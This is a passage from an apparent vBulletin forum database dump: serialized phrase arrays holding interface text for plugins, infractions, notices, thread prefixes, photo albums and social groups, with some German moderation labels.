Code\";s:22:\"plugin_products_system\";s:28:\"Plugin & Products System\";s:13:\"plugin_system\";s:13:\"Plugin System\";s:17:\"plugin_title_desc\";s:41:\"Enter a title that describes this plugin.\";s:22:\"plugins_disable_config\";s:71:\"Warning: Plugins are currently globally disabled via config.php.\";s:24:\"plugins_disabled_options\";s:276:\"Warning: Plugins are currently globally disabled in your options. In order for plugins and products to function correctly, you must enable the plugin system . Importing a product will do this for you automatically.\";s:10:\"product_id\";s:10:\"Product ID\";s:36:\"product_incompatible_version_x_mysql\";s:63:\"This product is not compatible with version %1$s of MySQL. %2$s\";s:34:\"product_incompatible_version_x_php\";s:61:\"This product is not compatible with version %1$s of PHP. %2$s\";s:40:\"product_incompatible_version_x_product_y\";s:83:\"This product is not compatible with version %1$s of the product %3$s . %2$s\";s:40:\"product_incompatible_version_x_vbulletin\";s:67:\"This product is not compatible with version %1$s of vBulletin. %2$s\";s:11:\"product_url\";s:11:\"Product URL\";s:27:\"product_x_must_be_activated\";s:81:\"The product %1$s must be activated before this product may be installed.\";s:27:\"product_x_must_be_installed\";s:86:\"The product %1$s must be installed before this product may be installed. %2$s\";s:21:\"product_x_out_of_date\";s:56:\"Product %1$s is out of date.\";s:20:\"product_x_up_to_date\";s:55:\"Product %1$s is up to date.\";s:18:\"save_active_status\";s:18:\"Save Active Status\";s:15:\"save_and_reload\";s:15:\"Save and Reload\";s:9:\"uninstall\";s:9:\"Uninstall\";s:14:\"uninstall_code\";s:14:\"Uninstall Code\";s:34:\"uninstall_product_break_products_x\";s:92:\"If you uninstall this product, the following products may no longer function:\r\n%1$s \";s:18:\"vb_prefix_reserved\";s:237:\"The product ID prefix vb is reserved for official vBulletin products. \r\n \r\nIf you have not received express permission from the vBulletin development team to use the vb prefix, please alter your product ID now.\";s:17:\"vbulletin_version\";s:17:\"vBulletin Version\";s:7:\"version\";s:7:\"Version\";s:17:\"version_check_url\";s:17:\"Version Check URL\";}', 'a:8:{s:11:\"field1_desc\";s:28:\"A few details about yourself\";s:12:\"field1_title\";s:9:\"Biography\";s:11:\"field2_desc\";s:14:\"Where you live\";s:12:\"field2_title\";s:8:\"Location\";s:11:\"field3_desc\";s:17:\"Your hobbies, etc\";s:12:\"field3_title\";s:9:\"Interests\";s:11:\"field4_desc\";s:8:\"Your job\";s:12:\"field4_title\";s:10:\"Occupation\";}', 'a:16:{s:11:\"reputation1\";s:30:\"is infamous around these parts\";s:12:\"reputation10\";s:29:\"is a glorious beacon of light\";s:12:\"reputation11\";s:22:\"is a name known to all\";s:12:\"reputation12\";s:27:\"is a splendid one to behold\";s:12:\"reputation13\";s:23:\"has much to be proud of\";s:12:\"reputation14\";s:22:\"has a brilliant future\";s:12:\"reputation15\";s:30:\"has a reputation beyond repute\";s:12:\"reputation16\";s:15:\"Schlechter User\";s:11:\"reputation2\";s:24:\"can only hope to improve\";s:11:\"reputation3\";s:44:\"has a little shameless behaviour in the past\";s:11:\"reputation4\";s:36:\"is an unknown quantity at this point\";s:11:\"reputation5\";s:26:\"is on a distinguished road\";s:11:\"reputation6\";s:30:\"will become famous soon enough\";s:11:\"reputation7\";s:28:\"has a spectacular aura about\";s:11:\"reputation8\";s:23:\"is a jewel in the rough\";s:11:\"reputation9\";s:19:\"is just really nice\";}', 'a:77:{s:6:\"active\";s:6:\"Active\";s:26:\"active_infraction_x_points\";s:32:\"Active Infraction (Points: %1$s)\";s:14:\"active_warning\";s:14:\"Active Warning\";s:21:\"add_new_automatic_ban\";s:21:\"Add New Automatic Ban\";s:29:\"add_new_user_infraction_group\";s:29:\"Add New User Infraction Group\";s:19:\"administrative_note\";s:19:\"Administrative Note\";s:6:\"amount\";s:6:\"Amount\";s:40:\"are_you_sure_want_to_delete_infraction_x\";s:48:\"Are you sure you want to delete Infraction %1$s?\";s:50:\"are_you_sure_you_want_to_delete_this_automatic_ban\";s:51:\"Are you sure you want to delete this automatic ban?\";s:53:\"are_you_sure_you_want_to_delete_this_infraction_group\";s:54:\"Are you sure you want to delete this infraction group?\";s:53:\"are_you_sure_you_want_to_delete_this_infraction_level\";s:54:\"Are you sure you want to delete this infraction level?\";s:13:\"automatic_ban\";s:13:\"Automatic Ban\";s:14:\"automatic_bans\";s:14:\"Automatic Bans\";s:13:\"ban_usergroup\";s:13:\"Ban Usergroup\";s:25:\"current_infraction_groups\";s:25:\"Current Infraction Groups\";s:17:\"custom_infraction\";s:17:\"Custom Infraction\";s:17:\"discussion_thread\";s:17:\"Discussion Thread\";s:7:\"expired\";s:7:\"Expired\";s:27:\"expired_infraction_x_points\";s:33:\"Expired Infraction (Points: %1$s)\";s:15:\"expired_warning\";s:15:\"Expired Warning\";s:7:\"expires\";s:7:\"Expires\";s:6:\"extend\";s:6:\"Extend\";s:15:\"give_infraction\";s:15:\"Give Infraction\";s:10:\"infraction\";s:10:\"Infraction\";s:16:\"infraction_group\";s:16:\"Infraction Group\";s:16:\"infraction_level\";s:16:\"Infraction Level\";s:17:\"infraction_reason\";s:17:\"Infraction Reason\";s:19:\"infraction_received\";s:25:\"Infraction Received: %1$s\";s:21:\"infraction_statistics\";s:21:\"Infraction Statistics\";s:15:\"infraction_type\";s:4:\"Type\";s:15:\"infraction_view\";s:4:\"View\";s:56:\"infraction_viewer_page_x_y_there_are_z_total_log_entries\";s:66:\"Infraction Viewer (page %1$s/%2$s) | There are %3$s total entries.\";s:14:\"infraction_x_y\";s:25:\"Infraction for %1$s: %2$s\";s:24:\"infractions_active_total\";s:28:\"Infractions (Active / Total)\";s:7:\"left_by\";s:7:\"Left By\";s:17:\"leftby_infraction\";s:7:\"Left By\";s:18:\"leftfor_infraction\";s:8:\"Left For\";s:15:\"message_to_user\";s:15:\"Message to User\";s:6:\"method\";s:6:\"Method\";s:8:\"no_title\";s:16:\"<No Title>\";s:19:\"order_by_expiration\";s:19:\"Order by Expiration\";s:15:\"order_by_points\";s:15:\"Order by Points\";s:16:\"override_display\";s:16:\"Override Display\";s:18:\"override_usergroup\";s:18:\"Override Usergroup\";s:25:\"override_with_permissions\";s:40:\"Override with Permissions from Usergroup\";s:6:\"points\";s:6:\"Points\";s:26:\"possible_infraction_groups\";s:26:\"Possible Infraction Groups\";s:26:\"removal_of_this_infraction\";s:148:\"Removal of this infraction will remove the infraction points that were incurred for this offense and decrease the user\'s infractions/warnings total.\";s:15:\"reversal_reason\";s:15:\"Reversal Reason\";s:7:\"reverse\";s:7:\"Reverse\";s:18:\"reverse_infraction\";s:26:\"Reverse Infraction/Warning\";s:23:\"reverse_this_infraction\";s:23:\"Reverse this Infraction\";s:20:\"reverse_this_warning\";s:20:\"Reverse this Warning\";s:8:\"reversed\";s:8:\"Reversed\";s:28:\"reversed_infraction_x_points\";s:34:\"Reversed Infraction (Points: %1$s)\";s:16:\"reversed_warning\";s:16:\"Reversed Warning\";s:6:\"status\";s:6:\"Status\";s:26:\"to_reverse_this_infraction\";s:82:\"To reverse this warning/infraction, click this box and press the \'Reverse\' button.\";s:15:\"user_infraction\";s:15:\"User Infraction\";s:21:\"user_infraction_for_x\";s:24:\"User Infraction for %1$s\";s:22:\"user_infraction_groups\";s:22:\"User Infraction Groups\";s:21:\"user_infraction_level\";s:21:\"User Infraction Level\";s:22:\"user_infraction_levels\";s:22:\"User Infraction Levels\";s:23:\"user_infraction_manager\";s:23:\"User Infraction Manager\";s:15:\"view_infraction\";s:23:\"View Infraction/Warning\";s:16:\"view_infractions\";s:16:\"View Infractions\";s:7:\"warning\";s:7:\"Warning\";s:12:\"warning_only\";s:12:\"Warning Only\";s:16:\"warning_received\";s:22:\"Warning Received: %1$s\";s:11:\"warning_x_y\";s:22:\"Warning for %1$s: %2$s\";s:8:\"warnings\";s:8:\"Warnings\";s:6:\"x_days\";s:11:\"%1$s Day(s)\";s:7:\"x_hours\";s:12:\"%1$s Hour(s)\";s:8:\"x_months\";s:13:\"%1$s Month(s)\";s:7:\"x_weeks\";s:12:\"%1$s Week(s)\";s:10:\"x_y_points\";s:20:\"%1$s - %2$s Point(s)\";s:7:\"x_years\";s:12:\"%1$s Year(s)\";}', 'a:13:{s:23:\"infractionlevel10_title\";s:14:\"Permanent Bann\";s:23:\"infractionlevel11_title\";s:12:\"1 Tages Bann\";s:23:\"infractionlevel12_title\";s:13:\"Doppelaccount\";s:23:\"infractionlevel13_title\";s:5:\"Fraud\";s:22:\"infractionlevel1_title\";s:22:\"Spammed Advertisements\";s:22:\"infractionlevel2_title\";s:24:\"Insulted Other Member(s)\";s:22:\"infractionlevel3_title\";s:24:\"Signature Rule Violation\";s:22:\"infractionlevel4_title\";s:22:\"Inappropriate Language\";s:22:\"infractionlevel5_title\";s:4:\"Spam\";s:22:\"infractionlevel6_title\";s:17:\"Falsches Subforum\";s:22:\"infractionlevel7_title\";s:7:\"Rufmord\";s:22:\"infractionlevel8_title\";s:11:\"Beleidigung\";s:22:\"infractionlevel9_title\";s:14:\"Ausdrucksweise\";}', 'a:30:{s:36:\"are_you_sure_want_to_delete_notice_x\";s:166:\"Are you sure you want to permanently delete the notice %1$s ?(%2$s=%3$s) \r\n \r\nThis operation cannot be un-done.\";s:38:\"browsing_forum_x_and_children_criteria\";s:54:\"User is browsing forum %1$s or one of its child forums\";s:25:\"browsing_forum_x_criteria\";s:27:\"User is browsing forum %1$s\";s:19:\"criterion_is_active\";s:19:\"Criterion is Active\";s:11:\"dismissible\";s:11:\"Dismissible\";s:25:\"display_notice_if_elipsis\";s:25:\"Display this notice if...\";s:11:\"edit_notice\";s:11:\"Edit Notice\";s:25:\"has_never_posted_criteria\";s:21:\"User has never posted\";s:32:\"has_x_infraction_points_criteria\";s:48:\"User has between %1$s and %2$s infraction points\";s:24:\"has_x_postcount_criteria\";s:48:\"User\'s post-count is between %1$s and %2$s posts\";s:25:\"has_x_reputation_criteria\";s:48:\"User has between %1$s and %2$s reputation points\";s:20:\"in_coventry_criteria\";s:35:\"User is in Coventry (global ignore)\";s:23:\"in_usergroup_x_criteria\";s:30:\"User belongs to usergroup %1$s\";s:20:\"is_birthday_criteria\";s:24:\"User\'s birthday is today\";s:16:\"is_date_criteria\";s:45:\"The date is %1$s %2$s (Use dd-mm-yyyy format)\";s:16:\"is_time_criteria\";s:65:\"The time is between %1$s and %2$s %3$s (Use hh:mm 24 hour format)\";s:27:\"no_posts_in_x_days_criteria\";s:69:\"User has not posted for %1$s days or more (but has posted previously)\";s:27:\"no_visit_in_x_days_criteria\";s:42:\"User has not visited for %1$s days or more\";s:27:\"not_in_usergroup_x_criteria\";s:38:\"User does not belong to usergroup %1$s\";s:11:\"notice_html\";s:11:\"Notice HTML\";s:23:\"notice_html_description\";s:230:\"This is the HTML that will be shown to visitors when the conditions set below are met. \r\n \r\nYou may include the following special variables in the HTML: \r\n{userid}, {username}, {musername}, {sessionurl}
\";s:24:\"notice_title_description\";s:40:\"This text is used solely in the Admin CP\";s:31:\"notice_x_not_displayed_criteria\";s:36:\"Criteria for notice %1$s are not met\";s:10:\"persistent\";s:10:\"Persistent\";s:22:\"persistent_description\";s:89:\"If this option is set to \'No\', the notice will be shown only once per visit to each user.\";s:34:\"pm_storage_x_percent_full_criteria\";s:64:\"User\'s private message storage is between %1$s%% and %2$s%% full\";s:19:\"style_is_x_criteria\";s:33:\"User is browsing using style %1$s\";s:13:\"user_timezone\";s:15:\"User\'s Timezone\";s:20:\"username_is_criteria\";s:23:\"User\'s username is %1$s\";s:18:\"utc_universal_time\";s:20:\"UTC / Universal Time\";}', 'a:5:{s:15:\"any_prefix_meta\";s:12:\"(any prefix)\";s:14:\"no_prefix_meta\";s:11:\"(no prefix)\";s:6:\"prefix\";s:6:\"Prefix\";s:23:\"prefixset_English_title\";s:9:\"[English]\";s:25:\"prefixset_bewerbung_title\";s:9:\"Bewerbung\";}', 'a:33:{s:10:\"add_prefix\";s:10:\"Add Prefix\";s:14:\"add_prefix_set\";s:14:\"Add Prefix Set\";s:13:\"adding_prefix\";s:13:\"Adding Prefix\";s:17:\"adding_prefix_set\";s:17:\"Adding Prefix Set\";s:41:\"allow_new_groups_to_use_selected_prefixes\";s:59:\"Allow Newly Created Usergroups To Use The Selected Prefixes\";s:36:\"are_you_sure_want_to_delete_prefix_x\";s:160:\"Are you sure you want to delete the prefix called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:39:\"are_you_sure_want_to_delete_prefixset_x\";s:164:\"Are you sure you want to delete the prefix set called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:21:\"copy_permissions_from\";s:21:\"Copy Permissions From\";s:19:\"copy_permissions_to\";s:19:\"Copy Permissions To\";s:37:\"deny_permission_for_selected_prefixes\";s:41:\"Deny Permission For All Selected Prefixes\";s:34:\"do_not_resolve_permission_conflict\";s:34:\"Do Not Resolve Permission Conflict\";s:32:\"edit_selected_prefix_permissions\";s:32:\"Edit Selected Prefix Permissions\";s:30:\"edit_thread_prefix_permissions\";s:30:\"Edit Thread Prefix Permissions\";s:25:\"editing_permissions_for_x\";s:28:\"Editing permissions for %1$s\";s:14:\"editing_prefix\";s:14:\"Editing Prefix\";s:18:\"editing_prefix_set\";s:18:\"Editing Prefix Set\";s:38:\"grant_permission_for_selected_prefixes\";s:42:\"Grant Permission For All Selected Prefixes\";s:35:\"leave_default_permissions_unchanged\";s:35:\"Leave Default Permissions Unchanged\";s:40:\"new_groups_may_not_use_selected_prefixes\";s:40:\"New Groups May Not Use Selected Prefixes\";s:36:\"new_groups_may_use_selected_prefixes\";s:36:\"New Groups May Use Selected Prefixes\";s:35:\"no_prefix_sets_defined_click_create\";s:152:\"There are no prefix sets defined. To create a prefix, you must first create a prefix set. Click here to create a set!\";s:32:\"no_prefixes_defined_click_create\";s:123:\"No prefixes defined for this set. Click here to create a prefix!\";s:48:\"overwrite_customized_permissions_no_restrictions\";s:168:\"Overwrite Customized Permissions\r\nIf you select no, only target prefixes with no restrictions will be updated. Selecting yes will update all target prefixes. \";s:27:\"prefix_id_alphanumeric_note\";s:60:\"Prefix ID\r\nA-Z, a-z, 0-9, and _ (underscore) only \";s:10:\"prefix_set\";s:10:\"Prefix Set\";s:31:\"prefix_set_id_alphanumeric_note\";s:64:\"Prefix Set ID\r\nA-Z, a-z, 0-9, and _ (underscore) only \";s:27:\"resolve_permission_conflict\";s:27:\"Resolve Permission Conflict\";s:23:\"set_default_permissions\";s:23:\"Set Default Permissions\";s:21:\"thread_prefix_manager\";s:21:\"Thread Prefix Manager\";s:15:\"thread_prefixes\";s:15:\"Thread Prefixes\";s:16:\"title_plain_text\";s:18:\"Title (Plain Text)\";s:15:\"title_rich_text\";s:17:\"Title (Rich Text)\";s:30:\"use_prefix_set_in_these_forums\";s:30:\"Use Prefix Set in These Forums\";}', 'a:73:{s:9:\"add_album\";s:9:\"Add Album\";s:21:\"add_picture_to_groups\";s:21:\"Add Picture to Groups\";s:12:\"add_pictures\";s:12:\"Add Pictures\";s:23:\"add_pictures_to_a_group\";s:23:\"Add Pictures to a Group\";s:24:\"add_selected_pictures_to\";s:24:\"Add selected pictures to\";s:12:\"add_to_group\";s:12:\"Add to Group\";s:5:\"album\";s:5:\"Album\";s:35:\"album_pictures_used_profile_styling\";s:118:\"This album has pictures used for profile styling. Removing the album or making it non-public will remove this styling!\";s:11:\"album_title\";s:11:\"Album Title\";s:10:\"album_type\";s:10:\"Album Type\";s:20:\"approve_this_picture\";s:20:\"Approve this picture\";s:7:\"bb_code\";s:7:\"BB Code\";s:7:\"caption\";s:7:\"Caption\";s:36:\"click_here_add_album_upload_pictures\";s:56:\"Click here to add an album and start uploading pictures!\";s:29:\"click_here_to_upload_pictures\";s:30:\"Click here to upload pictures!\";s:16:\"create_new_album\";s:16:\"Create New Album\";s:12:\"delete_album\";s:12:\"Delete Album\";s:19:\"delete_this_picture\";s:19:\"Delete this picture\";s:11:\"description\";s:11:\"Description\";s:10:\"edit_album\";s:10:\"Edit Album\";s:12:\"edit_picture\";s:12:\"Edit Picture\";s:20:\"edit_picture_comment\";s:20:\"Edit Picture Comment\";s:13:\"edit_pictures\";s:13:\"Edit Pictures\";s:13:\"first_picture\";s:13:\"First Picture\";s:6:\"groups\";s:6:\"Groups\";s:12:\"last_picture\";s:12:\"Last Picture\";s:21:\"leave_cover_unchanged\";s:21:\"Leave cover unchanged\";s:25:\"max_file_size_per_picture\";s:29:\"Maximum File Size per Picture\";s:22:\"max_picture_dimensions\";s:26:\"Maximum Picture Dimensions\";s:13:\"move_to_album\";s:13:\"Move to album\";s:12:\"next_picture\";s:20:\"Next Picture »\";s:37:\"note_comment_may_be_visible_locations\";s:60:\"(Note: your comment may be visible in alternative locations)\";s:34:\"only_report_inappropriate_pictures\";s:80:\"Note : This is ONLY to be used to report inappropriate pictures.\";s:8:\"overview\";s:8:\"Overview\";s:7:\"picture\";s:7:\"Picture\";s:13:\"picture_added\";s:13:\"Picture Added\";s:10:\"picture_by\";s:10:\"Picture By\";s:14:\"picture_limits\";s:14:\"Picture Limits\";s:17:\"picture_moderated\";s:9:\"Moderated\";s:26:\"picture_moderation_enabled\";s:115:\"Moderation EnabledYour pictures will not be visible until approved by a moderator. \";s:11:\"picture_url\";s:11:\"Picture URL\";s:34:\"picture_waiting_moderator_approval\";s:34:\"Picture Waiting Moderator Approval\";s:27:\"picture_x_of_y_from_album_z\";s:64:\"Picture %1$s of %2$s from Album %3$s \";s:29:\"pictured_used_profile_styling\";s:40:\"This picture is used for profile styling\";s:8:\"pictures\";s:8:\"Pictures\";s:46:\"pictures_automatically_resized_better_manually\";s:145:\"Pictures will be automatically resized to fit within these constraints if possible. However, you may receive better results by doing it manually.\";s:32:\"pictures_from_this_private_album\";s:72:\"(Pictures from this private album will be viewable to all group members)\";s:18:\"pictures_remaining\";s:18:\"Pictures Remaining\";s:18:\"pictures_to_upload\";s:18:\"Pictures to Upload\";s:12:\"post_comment\";s:12:\"Post Comment\";s:24:\"post_new_picture_comment\";s:24:\"Post New Picture Comment\";s:16:\"previous_picture\";s:24:\"« Previous Picture\";s:19:\"private_album_paren\";s:15:\"(Private Album)\";s:40:\"private_only_visible_contacts_moderators\";s:49:\"Private - Only visible to contacts and moderators\";s:19:\"profile_album_paren\";s:15:\"(Profile Album)\";s:37:\"profile_pictures_modify_profile_style\";s:52:\"Profile - Pictures used to modify your profile style\";s:6:\"public\";s:6:\"Public\";s:23:\"recently_updated_albums\";s:23:\"Recently Updated Albums\";s:14:\"report_picture\";s:14:\"Report Picture\";s:22:\"report_picture_comment\";s:22:\"Report Picture Comment\";s:15:\"space_remaining\";s:15:\"Space Remaining\";s:26:\"this_album_has_no_pictures\";s:38:\"This album does not have any pictures.\";s:19:\"this_is_album_cover\";s:23:\"This is the album cover\";s:23:\"this_user_has_no_albums\";s:46:\"This user does not have any albums to display.\";s:20:\"to_delete_this_album\";s:72:\"To delete this album, click this box and press the \'Delete Album\' button\";s:9:\"unlimited\";s:9:\"Unlimited\";s:15:\"upload_pictures\";s:15:\"Upload Pictures\";s:12:\"view_picture\";s:12:\"View Picture\";s:13:\"view_pictures\";s:13:\"View Pictures\";s:13:\"x_by_y_pixels\";s:19:\"%1$s by %2$s Pixels\";s:8:\"x_unread\";s:11:\"%1$s unread\";s:10:\"xs_album_y\";s:18:\"%1$s\'s Album: %2$s\";s:9:\"xs_albums\";s:13:\"%1$s\'s Albums\";}', 'a:216:{s:30:\"accept_social_group_transfer_x\";s:106:\"You have been requested to take ownership of the Social Group %1$s. \r\nWould you like to accept?\";s:16:\"add_new_category\";s:16:\"Add New Category\";s:28:\"add_new_socialgroup_category\";s:29:\"Add New Social Group Category\";s:21:\"add_pictures_to_group\";s:21:\"Add Pictures to Group\";s:26:\"add_pictures_to_this_group\";s:27:\"Add pictures to this group!\";s:10:\"all_groups\";s:10:\"All Groups\";s:19:\"approve_discussions\";s:19:\"Approve Discussions\";s:51:\"are_you_sure_you_want_to_delete_category_x_y_groups\";s:250:\"Are you sure you want to delete the social group category %1$s ? \r\nIf you choose to delete this category, you must choose a different category into which the %2$s social groups belonging to the %1$s category will be moved.\";s:40:\"are_you_sure_you_want_to_delete_x_groups\";s:46:\"Are you sure you want to delete %1$s group(s)?\";s:16:\"available_groups\";s:16:\"Available Groups\";s:9:\"bookmarks\";s:9:\"Bookmarks\";s:17:\"cancel_invitation\";s:17:\"Cancel Invitation\";s:19:\"cancel_join_request\";s:19:\"Cancel Join Request\";s:28:\"cancel_join_request_question\";s:20:\"Cancel Join Request?\";s:10:\"categories\";s:10:\"Categories\";s:8:\"category\";s:8:\"Category\";s:15:\"category_filter\";s:15:\"Category Filter\";s:11:\"category_is\";s:11:\"Category is\";s:13:\"category_name\";s:13:\"Category Name\";s:27:\"confirm_cancel_join_group_x\";s:70:\"Are you sure you wish to cancel your request to join the group \"%1$s\"?\";s:28:\"confirm_decline_join_group_x\";s:73:\"Are you sure you wish to decline the invitation to join the group \"%1$s\"?\";s:22:\"confirm_delete_group_x\";s:56:\"Are you sure you want to delete the group called \"%1$s\"?\";s:20:\"confirm_join_group_x\";s:54:\"Are you sure you want to join the group called \"%1$s\"?\";s:21:\"confirm_leave_group_x\";s:55:\"Are you sure you wish to leave the group called \"%1$s\"?\";s:30:\"confirm_remove_picture_group_x\";s:67:\"Are you sure you want to remove this picture from the group \"%1$s\"?\";s:18:\"create_a_new_group\";s:18:\"Create a New Group\";s:12:\"create_group\";s:12:\"Create Group\";s:17:\"create_group_icon\";s:17:\"Create Group Icon\";s:20:\"creation_date_filter\";s:20:\"Creation Date Filter\";s:22:\"creation_date_is_after\";s:22:\"Creation Date is After\";s:23:\"creation_date_is_before\";s:23:\"Creation Date is Before\";s:18:\"current_group_icon\";s:18:\"Current Group Icon\";s:17:\"custom_group_icon\";s:17:\"Custom Group Icon\";s:13:\"date_is_after\";s:13:\"Date is after\";s:14:\"date_is_before\";s:14:\"Date is Before\";s:23:\"decline_join_invitation\";s:18:\"Decline Invitation\";s:32:\"decline_join_invitation_question\";s:19:\"Decline Invitation?\";s:17:\"delete_discussion\";s:17:\"Delete Discussion\";s:42:\"delete_discussion_check_appropriate_option\";s:110:\"To delete this discussion, check the appropriate option below and then click the \'Delete this Message\' button.\";s:18:\"delete_discussions\";s:18:\"Delete Discussions\";s:12:\"delete_group\";s:12:\"Delete Group\";s:23:\"delete_group_discussion\";s:17:\"Delete Discussion\";s:21:\"delete_group_question\";s:13:\"Delete Group?\";s:22:\"delete_selected_groups\";s:22:\"Delete Selected Groups\";s:23:\"deleted_selected_groups\";s:23:\"Deleted Selected Groups\";s:15:\"deleting_groups\";s:15:\"Deleting groups\";s:10:\"deleting_x\";s:16:\"Deleting %1$s...\";s:24:\"deselect_all_discussions\";s:24:\"Deselect All Discussions\";s:10:\"discussion\";s:10:\"Discussion\";s:23:\"discussion_deleted_by_x\";s:46:\"Discussion deleted by %2$s .\";s:34:\"discussion_hidden_x_on_ignore_list\";s:114:\"This discussion is hidden because %1$s is on your ignore list .\";s:16:\"discussion_tools\";s:16:\"Discussion Tools\";s:24:\"do_not_delete_discussion\";s:24:\"Do Not Delete Discussion\";s:7:\"doleave\";s:12:\"Leave Group?\";s:15:\"edit_discussion\";s:15:\"Edit Discussion\";s:10:\"edit_group\";s:10:\"Edit Group\";s:15:\"edit_group_icon\";s:15:\"Edit Group Icon\";s:12:\"edit_message\";s:12:\"Edit Message\";s:13:\"enable_albums\";s:13:\"Enable Albums\";s:15:\"enable_messages\";s:15:\"Enable Messages\";s:6:\"filter\";s:6:\"Filter\";s:16:\"find_groups_with\";s:16:\"Find Groups With\";s:40:\"following_urls_invalid_picture_not_found\";s:126:\"The following URLs were invalid. The specified picture could not be found or did not come from your albums .\";s:6:\"from_x\";s:72:\"From %3$s \";s:13:\"group_created\";s:7:\"Created\";s:16:\"group_created_by\";s:16:\"Group Created By\";s:21:\"group_desc_inviteonly\";s:46:\"This is an invite only group.\";s:20:\"group_desc_moderated\";s:43:\"This is a moderated group.\";s:17:\"group_desc_public\";s:40:\"This is a public group.\";s:17:\"group_description\";s:17:\"Group Description\";s:20:\"group_does_not_exist\";s:25:\"That group does not exist\";s:24:\"group_has_no_discussions\";s:45:\"This group does not have any discussions yet.\";s:15:\"group_icon_desc\";s:304:\"Social group icons are small pictures representing a social group, which are displayed when viewing a social group or as a smaller version when browsing group listings. Note: Your group will not show up in New Groups or Random Group on the group overview page unless you have uploaded an icon.\";s:24:\"group_icon_file_path_dfn\";s:125:\"Social Group Icon File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:56:\"group_icons_are_currently_being_served_from_the_database\";s:63:\"Social Group Icons are currently being served from the database\";s:63:\"group_icons_are_currently_being_served_from_the_filesystem_at_x\";s:73:\"Social group icons are currently being served from the filesystem at %1$s\";s:19:\"group_maintained_by\";s:19:\"Group Maintained By\";s:21:\"group_maintained_by_x\";s:43:\"Group Maintained by %2$s \";s:13:\"group_options\";s:13:\"Group Options\";s:42:\"group_ownership_transfer_request_sent_to_x\";s:261:\"A request to transfer the ownership of this social group to %2$s is in progress. If you would like to transfer the group to another user you must first cancel this transfer request. Would you like to do this now?\";s:14:\"group_pictures\";s:14:\"Group Pictures\";s:19:\"group_subscriptions\";s:19:\"Group Subscriptions\";s:11:\"group_tools\";s:11:\"Group Tools\";s:10:\"group_type\";s:10:\"Group Type\";s:21:\"group_type_inviteonly\";s:11:\"Invite Only\";s:20:\"group_type_moderated\";s:9:\"Moderated\";s:17:\"group_type_public\";s:6:\"Public\";s:18:\"groups_you_created\";s:18:\"Groups You Created\";s:13:\"in_category_x\";s:33:\"in category %1$s \";s:16:\"invalid_username\";s:42:\"The user you have specified was not found.\";s:6:\"invite\";s:6:\"Invite\";s:11:\"invite_user\";s:11:\"Invite User\";s:13:\"invited_users\";s:13:\"Invited Users\";s:25:\"invited_users_description\";s:51:\"The following users have been invited to this group\";s:14:\"is_in_category\";s:14:\"Is in Category\";s:10:\"join_group\";s:10:\"Join Group\";s:19:\"join_group_question\";s:11:\"Join Group?\";s:24:\"join_moderated_extratext\";s:90:\"Please Note: This is a moderated group, your membership will need to be approved. \";s:12:\"joined_group\";s:6:\"Joined\";s:12:\"kick_members\";s:14:\"Remove Members\";s:24:\"kick_members_description\";s:45:\"The following users are members of this group\";s:20:\"last_member_of_group\";s:101:\"The only member left in this group is the owner. The owner cannot be removed from a group.\";s:12:\"last_updated\";s:12:\"Last Updated\";s:20:\"leave_group_question\";s:12:\"Leave Group?\";s:18:\"leave_social_group\";s:11:\"Leave Group\";s:14:\"manage_members\";s:14:\"Manage Members\";s:32:\"may_add_pictures_group_paste_url\";s:268:\"You may add pictures to this group from your albums . Paste the URL of each picture you want to add on a separate line. Alternatively, you can add pictures to this group by first viewing them in your albums and then selecting \"Add Pictures to Group\".\";s:11:\"member_list\";s:11:\"Member List\";s:17:\"member_management\";s:17:\"Member Management\";s:20:\"members_greater_than\";s:20:\"Members Greater Than\";s:18:\"members_in_group_x\";s:56:\"Members in Social Group %1$s \";s:17:\"members_less_than\";s:17:\"Members Less Than\";s:26:\"members_pending_moderation\";s:26:\"Members Pending Moderation\";s:38:\"members_pending_moderation_description\";s:43:\"The following users want to join this group\";s:34:\"messages_must_be_approved_by_owner\";s:38:\"Messages must be approved by the owner\";s:22:\"moderated_social_group\";s:22:\"Moderated Social Group\";s:46:\"move_group_icons_from_database_into_filesystem\";s:54:\"Move Social Group Icons from Database into File System\";s:46:\"move_group_icons_from_filesystem_into_database\";s:54:\"Move group icons from the filesystem into the database\";s:41:\"move_group_icons_to_a_different_directory\";s:41:\"Move group icons to a different directory\";s:17:\"must_join_to_view\";s:58:\"You need to be a member of this group to view its contents\";s:14:\"new_discussion\";s:19:\"Post New Discussion\";s:10:\"new_groups\";s:10:\"New Groups\";s:20:\"no_discussions_found\";s:55:\"No discussions were found. Try different search terms.\";s:13:\"no_group_icon\";s:30:\"No Social Group Icon Specified\";s:15:\"no_groups_found\";s:20:\"No Groups were Found\";s:35:\"no_groups_selected_or_invalid_input\";s:55:\"No groups selected, or you have provided invalid input.\";s:20:\"no_groups_to_display\";s:20:\"No Groups to Display\";s:27:\"no_pictures_added_group_yet\";s:46:\"No pictures have been added to this group yet.\";s:10:\"no_results\";s:17:\"No results found.\";s:16:\"no_social_groups\";s:27:\"There are no social groups.\";s:15:\"not_group_owner\";s:27:\"You are not the group owner\";s:12:\"not_in_group\";s:35:\"You are not a member of that group!\";s:37:\"number_of_groups_to_process_per_cycle\";s:37:\"Number of Groups to process per cycle\";s:22:\"one_url_per_line_paren\";s:18:\"(One URL per line)\";s:33:\"only_owner_can_create_discussions\";s:47:\"Only the group owner can create new discussions\";s:37:\"only_owner_can_create_new_discussions\";s:37:\"Only owner can create new discussions\";s:27:\"pending_and_invited_members\";s:29:\"Pending & Invited Members\";s:15:\"pending_members\";s:15:\"Pending Members\";s:28:\"physically_remove_discussion\";s:28:\"Physically Remove Discussion\";s:12:\"picture_urls\";s:12:\"Picture URLs\";s:27:\"picture_x_of_y_from_group_z\";s:64:\"Picture %1$s of %2$s from Group %3$s \";s:21:\"pictures_from_group_x\";s:52:\"Pictures from Group %1$s \";s:61:\"pm_request_to_take_ownership_of_social_group_accepted_message\";s:119:\"The user %1$s has accepted a request to take ownership of the Social Group [url=%2$s/group.php?groupid=%3$s]%4$s[/url].\";s:59:\"pm_request_to_take_ownership_of_social_group_accepted_title\";s:55:\"Request to Take Ownership of Social Group %1$s Accepted\";s:52:\"pm_request_to_take_ownership_of_social_group_message\";s:219:\"A request has been made for you to take ownership of the Social Group [url=%1$s/group.php?groupid=%2$s]%3$s[/url].\r\n\r\n[url=%1$s/group.php?groupid=%2$s&do=accepttransfer]Click here to accept or reject this request[/url].\";s:50:\"pm_request_to_take_ownership_of_social_group_title\";s:46:\"Request to Take 